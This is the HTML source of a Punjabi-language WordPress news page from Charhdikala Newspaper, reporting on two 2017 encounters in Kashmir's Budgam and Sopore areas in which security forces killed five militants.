<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#8216;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ &#8211; Charhdikala Newspaper</title>

<link rel="stylesheet" href="http://charhdikala.com/wp-content/themes/Newspaper/style.css" type="text/css" media="screen" />
<link rel="pingback" href="http://charhdikala.com/xmlrpc.php" />



<meta property="og:image" content="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_14_38_307620000mko-ll.jpg" /><meta name="author" content="admin">
<link rel="alternate" type="application/rss+xml" title="Charhdikala Newspaper &raquo; Feed" href="http://charhdikala.com/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Charhdikala Newspaper &raquo; Comments Feed" href="http://charhdikala.com/?feed=comments-rss2" />
<link rel="alternate" type="application/rss+xml" title="Charhdikala Newspaper &raquo; ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#8216;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ Comments Feed" href="http://charhdikala.com/?feed=rss2&#038;p=6178" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/charhdikala.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.12"}};
			!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;if(!g||!g.fillText)return!1;switch(g.textBaseline="top",g.font="600 32px Arial",a){case"flag":return g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3;case"diversity":return g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,d=c[0]+","+c[1]+","+c[2]+","+c[3],g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0]+","+c[1]+","+c[2]+","+c[3],d!==e;case"simple":return g.fillText(h(55357,56835),0,0),0!==g.getImageData(16,16,1,1).data[0];case"unicode8":return g.fillText(h(55356,57135),0,0),0!==g.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='rs-plugin-settings-css'  href='http://charhdikala.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.6.93' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.5.12' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C500italic%2C400%2C300&#038;ver=4.5.12' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://charhdikala.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://charhdikala.com/wp-content/themes/Newspaper/style.css?ver=6.6' type='text/css' media='all' />
<script type='text/javascript' src='http://charhdikala.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://charhdikala.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://charhdikala.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?ver=4.6.93'></script>
<script type='text/javascript' src='http://charhdikala.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=4.6.93'></script>
<link rel='https://api.w.org/' href='http://charhdikala.com/?rest_route=/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://charhdikala.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://charhdikala.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='ਪੰਜਾਬ ਨਗਰ-ਨਿਗਮ ਚੋਣਾਂ 17 ਦਸੰਬਰ ਨ' href='http://charhdikala.com/?p=6175' />
<link rel='next' title='ਸੁਖਪਾਲ ਖਹਿਰਾ ਪੁੱਜੇ ਸੁਪਰੀਮ ਕੋਰਟ, ਅੱਜ ਹੋ ਸਕਦੀ ਹੈ ਸੁਣਵਾਈ' href='http://charhdikala.com/?p=6181' />
<meta name="generator" content="WordPress 4.5.12" />
<link rel="canonical" href="http://charhdikala.com/?p=6178" />
<link rel='shortlink' href='http://charhdikala.com/?p=6178' />
<link rel="alternate" type="application/json+oembed" href="http://charhdikala.com/?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178" />
<link rel="alternate" type="text/xml+oembed" href="http://charhdikala.com/?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178&#038;format=xml" />
		<script type="text/javascript">
			jQuery(document).ready(function() {
				// CUSTOM AJAX CONTENT LOADING FUNCTION
				var ajaxRevslider = function(obj) {
				
					// obj.type : Post Type
					// obj.id : ID of Content to Load
					// obj.aspectratio : The Aspect Ratio of the Container / Media
					// obj.selector : The Container Selector where the Content of Ajax will be injected. It is done via the Essential Grid on Return of Content
					
					var content = "";

					data = {};
					
					data.action = 'revslider_ajax_call_front';
					data.client_action = 'get_slider_html';
					data.token = '57150d1368';
					data.type = obj.type;
					data.id = obj.id;
					data.aspectratio = obj.aspectratio;
					
					// SYNC AJAX REQUEST
					jQuery.ajax({
						type:"post",
						url:"http://charhdikala.com/wp-admin/admin-ajax.php",
						dataType: 'json',
						data:data,
						async:false,
						success: function(ret, textStatus, XMLHttpRequest) {
							if(ret.success == true)
								content = ret.data;								
						},
						error: function(e) {
							console.log(e);
						}
					});
					
					 // FIRST RETURN THE CONTENT WHEN IT IS LOADED !!
					 return content;						 
				};
				
				// CUSTOM AJAX FUNCTION TO REMOVE THE SLIDER
				var ajaxRemoveRevslider = function(obj) {
					return jQuery(obj.selector+" .rev_slider").revkill();
				};

				// EXTEND THE AJAX CONTENT LOADING TYPES WITH TYPE AND FUNCTION
				var extendessential = setInterval(function() {
					if (jQuery.fn.tpessential != undefined) {
						clearInterval(extendessential);
						if(typeof(jQuery.fn.tpessential.defaults) !== 'undefined') {
							jQuery.fn.tpessential.defaults.ajaxTypes.push({type:"revslider",func:ajaxRevslider,killfunc:ajaxRemoveRevslider,openAnimationSpeed:0.3});   
							// type:  Name of the Post to load via Ajax into the Essential Grid Ajax Container
							// func: the Function Name which is Called once the Item with the Post Type has been clicked
							// killfunc: function to kill in case the Ajax Window going to be removed (before Remove function !
							// openAnimationSpeed: how quick the Ajax Content window should be animated (default is 0.3)
						}
					}
				},30);
			});
		</script>
		<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://charhdikala.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://charhdikala.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    

var tdBlocksArray = []; //here we store all the items for the current page

//td_block class - each ajax block uses a object of this class for requests
function tdBlock() {
    this.id = '';
    this.block_type = 1; //block type id (1-234 etc)
    this.atts = '';
    this.td_column_number = '';
    this.td_current_page = 1; //
    this.post_count = 0; //from wp
    this.found_posts = 0; //from wp
    this.max_num_pages = 0; //from wp
    this.td_filter_value = ''; //current live filter value
    this.is_ajax_running = false;
    this.td_user_action = ''; // load more or infinite loader (used by the animation)
    this.header_color = '';
    this.ajax_pagination_infinite_stop = ''; //show load more at page x
}

    
    
        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/charhdikala.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=6.6";
var td_get_template_directory_uri="http:\/\/charhdikala.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>
    
.block-title > span,
    .block-title > a,
    .block-title > label,
    .widgettitle,
    .widgettitle:after,
    .td-trending-now-title,
    .td-trending-now-wrapper:hover .td-trending-now-title,
    .wpb_tabs li.ui-tabs-active a,
    .wpb_tabs li:hover a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a,
    .td-related-title .td-cur-simple-item,
    .woocommerce .product .products h2,
    .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more,
    .td-weather-information:before,
    .td-weather-week:before {
        background-color: #222222;
    }

    .woocommerce div.product .woocommerce-tabs ul.tabs li.active {
    	background-color: #222222 !important;
    }

    .block-title,
    .td-related-title,
    .wpb_tabs .wpb_tabs_nav,
    .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container,
    .woocommerce div.product .woocommerce-tabs ul.tabs:before {
        border-color: #222222;
    }
</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-103672596-1', 'auto');
  ga('send', 'pageview');

</script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>
<body class="single single-post postid-6178 single-format-standard --2---5- wpb-js-composer js-comp-ver-4.8.1 vc_responsive td-animation-stack-type0 td-full-layout">
<div id="page">

<div id="header" role="banner">
	<div id="headerimg">
		<h1><a href="http://charhdikala.com/">Charhdikala Newspaper</a></h1>
		<div class="description">By Charhdikala Group</div>
	</div>
</div>
<hr />
<div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://charhdikala.com/"><span itemprop="title">Home</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in Breaking News" class="entry-crumb" itemprop="url" href="http://charhdikala.com/?cat=6"><span itemprop="title">Breaking News</span></a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#8216;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ"><meta itemprop="url" content = "http://charhdikala.com/?p=6178">ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#8216;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-6178" class="post-6178 post type-post status-publish format-standard has-post-thumbnail hentry category-breaking-news" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  style="background-color:#e33a77; color:#fff; border-color:#e33a77;" href="http://charhdikala.com/?cat=6">Breaking News</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">ਫ਼ੌਜ ਵੱਲੋਂ 2 ਮੁਕਾਬਲਿਆਂ &#8216;ਚ 5 ਅਤਿਵਾਦੀ ਢੇਰ</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a itemprop="author" href="http://charhdikala.com/?author=1">admin</a> - </div>                    <div class="td-post-date"><time  itemprop="dateCreated" class="entry-date updated td-module-date" datetime="2017-11-30T16:59:15+00:00" >November 30, 2017</time><meta itemprop="interactionCount" content="UserComments:0"/></div>                    <div class="td-post-comments"><a href="http://charhdikala.com/?p=6178#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-6178">15</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=%E0%A9%9E%E0%A9%8C%E0%A8%9C+%E0%A8%B5%E0%A9%B1%E0%A8%B2%E0%A9%8B%E0%A8%82+2+%E0%A8%AE%E0%A9%81%E0%A8%95%E0%A8%BE%E0%A8%AC%E0%A8%B2%E0%A8%BF%E0%A8%86%E0%A8%82+%E2%80%98%E0%A8%9A+5+%E0%A8%85%E0%A8%A4%E0%A8%BF%E0%A8%B5%E0%A8%BE%E0%A8%A6%E0%A9%80+%E0%A8%A2%E0%A9%87%E0%A8%B0&url=http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178&via=Charhdikala+Newspaper"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://charhdikala.com/?p=6178" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://charhdikala.com/?p=6178&amp;media=http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_14_38_307620000mko-ll.jpg&description=%E0%A9%9E%E0%A9%8C%E0%A8%9C+%E0%A8%B5%E0%A9%B1%E0%A8%B2%E0%A9%8B%E0%A8%82+2+%E0%A8%AE%E0%A9%81%E0%A8%95%E0%A8%BE%E0%A8%AC%E0%A8%B2%E0%A8%BF%E0%A8%86%E0%A8%82+%E2%80%98%E0%A8%9A+5+%E0%A8%85%E0%A8%A4%E0%A8%BF%E0%A8%B5%E0%A8%BE%E0%A8%A6%E0%A9%80+%E0%A8%A2%E0%A9%87%E0%A8%B0" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=%E0%A9%9E%E0%A9%8C%E0%A8%9C+%E0%A8%B5%E0%A9%B1%E0%A8%B2%E0%A9%8B%E0%A8%82+2+%E0%A8%AE%E0%A9%81%E0%A8%95%E0%A8%BE%E0%A8%AC%E0%A8%B2%E0%A8%BF%E0%A8%86%E0%A8%82+%E2%80%98%E0%A8%9A+5+%E0%A8%85%E0%A8%A4%E0%A8%BF%E0%A8%B5%E0%A8%BE%E0%A8%A6%E0%A9%80+%E0%A8%A2%E0%A9%87%E0%A8%B0 - http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178" ><i class="td-icon-whatsapp"></i></a>
	            </div></div>

        <div class="td-post-content">

        <div class="td-post-featured-image"><a href="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_14_38_307620000mko-ll.jpg" data-caption=""><img width="600" height="400" itemprop="image" class="entry-thumb td-modal-image" src="http://charhdikala.com/wp-content/uploads/2017/11/2017_11image_14_38_307620000mko-ll.jpg" alt="" title="2017_11image_14_38_307620000mko-ll"/></a></div>
        <p>ਸ੍ਰੀਨਗਰ, 30 ਨਵੰਬਰ (ਪੱਤਰ ਪ੍ਰੇਰਕ) :  ਮੱਧ ਕਸ਼ਮੀਰ &#8216;ਚ ਬੜਗਾਮ ਜ਼ਿਲ੍ਹੇ ਦੇ ਪਾਖੇਰਪੋਰਾ &#8216;ਚ ਅੱਜ ਸਵੇਰੇ ਸੁਰੱਖਿਆ ਫੋਰਸ ਦੇ ਨਾਲ ਮੁਕਾਬਲੇ &#8216;ਚ 4 ਅੱਤਵਾਦੀ ਮਾਰੇ ਗਏ। ਇਸ ਦੇ ਨਾਲ ਹੀ ਸੋਪੋਰ ਮੁਕਾਬਲੇ &#8216;ਚ ਫੌਜ ਨੇ ਇਕ ਅੱਤਵਾਦੀ ਨੂੰ ਢੇਰ ਕਰ ਦਿੱਤਾ। ਫੌਜ ਦੇ ਇਕ ਅਧਿਕਾਰੀ ਨੇ ਦੱਸਿਆ ਕਿ ਇਥੋਂ ਕਰੀਬ 45 ਕਿਲੋਮੀਟਰ ਦੀ ਦੂਰੀ &#8216;ਤੇ ਸਥਿਤ ਪਾਖੇਰਪੋਰਾ ਇਲਾਕੇ &#8216;ਚ ਫੁੱਟਲੀਪੋਰਾ &#8216;ਚ ਅਤਿਵਾਦੀਆਂ ਦੀ ਮੌਜੂਦਗੀ ਦੀ ਸੂਚਨਾ &#8216;ਤੇ ਸੁਰੱਖਿਆ ਫੋਰਸ ਨੇ ਘੇਰਾ ਪਾ ਕੇ ਸਰਚ ਮੁਹਿੰਮ ਚਲਾਈ। ਉਨ੍ਹਾਂ ਨੇ ਕਿਹਾ ਕਿ ਅੱਤਵਾਦੀਆਂ ਨੇ ਸੁਰੱਖਿਆ ਫੋਰਸ &#8216;ਤੇ ਗੋਲੀਬਾਰੀ ਕੀਤੀ। ਜਵਾਬੀ ਕਾਰਵਾਈ ਤੋਂ ਬਾਅਦ ਦੋਵੇਂ ਪੱਖਾਂ &#8216;ਚ ਮੁਕਾਬਲਾ ਸ਼ੁਰੂ ਹੋ ਗਿਆ। ਅਧਿਕਾਰੀ ਨੇ ਦੱਸਿਆ ਕਿ, &#8216;ਮੁਕਾਬਲੇ &#8216;ਚ 4 ਅੱਤਵਾਦੀ ਮਾਰੇ ਗਏ ਹਨ।&#8217; ਉਨ੍ਹਾਂ ਨੇ ਦੱਸਿਆ ਕਿ ਮੁਹਿੰਮ ਅਜੇ ਜਾਰੀ ਹੈ। ਪੁਲਿਸ ਸੂਤਰਾਂ ਨੇ ਦੱਸਿਆ ਕਿ ਮੁਹਿੰਮ ਦੌਰਾਨ ਸੁਰੱਖਿਆ ਫੋਰਸ ਦੇ ਇਕ ਜਵਾਨ ਨੂੰ ਸੱਟਾਂ ਲੱਗੀਆਂ ਹਨ ਜਦੋਂਕਿ ਪ੍ਰਦਰਸ਼ਨਕਾਰੀ ਅੱਤਵਾਦ ਰੋਧਕ ਮੁਹਿੰਮ ਨੂੰ ਰੋਕਣ ਦੀ ਕੋਸ਼ਿਸ਼ ਕਰ ਰਹੇ ਸਨ।</p>
<p>ਬੜਗਾਮ ਮੁਕਾਬਲੇ &#8216;ਚ ਜੈਸ਼ ਦੇ 4 ਅੱਤਵਾਦੀ ਘਿਰੇ, ਸੁਰੱਖਿਆ ਫੋਰਸ ਨੇ ਪੂਰੇ ਇਲਾਕੇ ਨੂੰ ਘੇਰਿਆ<br />
ਸ਼੍ਰੀਨਗਰ : ਜੰਮੂ-ਕਸ਼ਮੀਰ &#8216;ਚ ਅੱਜ ਸਵੇਰੇ ਤੋਂ ਹੀ ਸੁਰੱਖਿਆ ਫੋਰਸ ਅਤੇ ਅੱਤਵਾਦੀਆਂ ਵਿਚਕਾਰ ਮੁਕਾਬਲਾ ਜਾਰੀ ਹੈ। ਸੁਰੱਖਿਆ ਫੋਰਸ ਨੇ ਮੱਧ ਕਸ਼ਮੀਰ &#8216;ਚ ਬੜਗਾਮ ਜ਼ਿਲੇ ਦੇ ਫੁਟਲਿਪੋਰਾ ਪਿੰਡ &#8216;ਚ ਅੱਤਵਾਦੀਆਂ ਨੂੰ ਘੇਰਿਆ ਹੋਇਆ ਹੈ। ਮਿਲੀ ਜਾਣਕਾਰੀ ਅਨੁਸਾਰ 3 ਤੋਂ 4 ਅੱਤਵਾਦੀਆਂ ਦੇ ਇਸ ਇਲਾਕੇ &#8216;ਚ ਲੁਕੇ ਹੋਣ ਦਾ ਸ਼ੱਕ ਹੈ। ਟੀ.ਵੀ. ਰਿਪੋਰਟ ਦੇ ਅਨੁਸਾਰ ਅੱਤਵਾਦੀ ਜੈਸ਼-ਏ-ਮੁਹੰਮਦ ਸੰਗਠਨ ਦੇ ਦੱਸੇ ਜਾ ਰਹੇ ਹਨ। ਅੱਤਵਾਦੀਆਂ ਦੇ ਇਲਾਕੇ ਲੁਕੇ ਹੋਣ ਦੀ ਖਬਰ ਮਿਲਣ ਤੋਂ ਬਾਅਦ ਸੁਰੱਖਿਆ ਫੋਰਸ ਨੇ ਰਾਤ ਨੂੰ ਹੀ ਪਿੰਡ ਦੀ ਘੇਰਾਬੰਦੀ ਕਰਕੇ ਤਲਾਸ਼ੀ ਮੁਹਿੰਮ ਸ਼ੁਰੂ ਕਰ ਦਿੱਤੀ ਸੀ। ਇਸ ਤੋਂ ਬਾਅਦ ਅੱਤਵਾਦੀਆਂ ਵਲੋਂ ਫਾਇਰਿੰਗ ਕੀਤੀ ਗਈ, ਸੁਰੱਖਿਆ ਫੋਰਸ ਨੇ ਇਸਦੀ ਜਵਾਬੀ ਕਾਰਵਾਈ ਕੀਤੀ। ਜ਼ਿਕਰਯੋਗ ਹੈ ਕਿ ਇਸ ਤੋਂ ਪਹਿਲਾਂ ਵੀ ਬੜਗਾਮ ਜ਼ਿਲੇ &#8216;ਚ ਪੁਲਿਸ ਨੇ ਤਿੰਨ ਅੱਤਵਾਦੀਆਂ ਨੂੰ ਗ੍ਰਿਫਤਾਰ ਕੀਤਾ ਸੀ, ਇਹ ਤਿੰਨੋਂ ਅੱਤਵਾਦੀ ਸੰਗਠਨ ਜੈਸ਼-ਏ-ਮੁਹੰਮਦ ਨਾਲ ਜੁੜੇ  ਹਨ।</p>
<p>ਜੰਮੂ ਕਸ਼ਮੀਰ &#8216;ਚ ਇਸ ਸਾਲ 200 ਅੱਤਵਾਦੀ ਢੇਰ<br />
ਸ੍ਰੀਨਗਰ, 30 ਨਵੰਬਰ &#8211; ਇਕ ਰਿਪੋਰਟ ਮੁਤਾਬਿਕ ਜੰਮੂ ਕਸ਼ਮੀਰ &#8216;ਚ ਦੋ ਮੁਕਾਬਲਿਆਂ &#8216;ਚ ਅੱਜ ਪੰਜ ਅੱਤਵਾਦੀ ਮਾਰੇ ਗਏ ਹਨ ਤੇ ਅਪਰੇਸ਼ਨ ਅਜੇ ਵੀ ਜਾਰੀ ਹਨ। ਜਿਸ ਤੋਂ ਬਾਅਦ ਇਸ ਸਾਲ ਹੁਣ ਤੱਕ 200 ਅੱਤਵਾਦੀ ਸੁਰੱਖਿਆ ਬਲਾਂ ਹੱਥੋਂ ਮਾਰੇ ਗਏ ਹਨ।</p>
<div class="td-a-rec td-a-rec-id-content_bottom "><div class="td-all-devices"><a href="#"><img src="http://charhdikala.com/wp-content/uploads/2016/04/rec728.jpg"/></a></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=%E0%A9%9E%E0%A9%8C%E0%A8%9C+%E0%A8%B5%E0%A9%B1%E0%A8%B2%E0%A9%8B%E0%A8%82+2+%E0%A8%AE%E0%A9%81%E0%A8%95%E0%A8%BE%E0%A8%AC%E0%A8%B2%E0%A8%BF%E0%A8%86%E0%A8%82+%E2%80%98%E0%A8%9A+5+%E0%A8%85%E0%A8%A4%E0%A8%BF%E0%A8%B5%E0%A8%BE%E0%A8%A6%E0%A9%80+%E0%A8%A2%E0%A9%87%E0%A8%B0&url=http%3A%2F%2Fcharhdikala.com%2F%3Fp%3D6178&via=Charhdikala+Newspaper"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://charhdikala.com/?p=6178" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
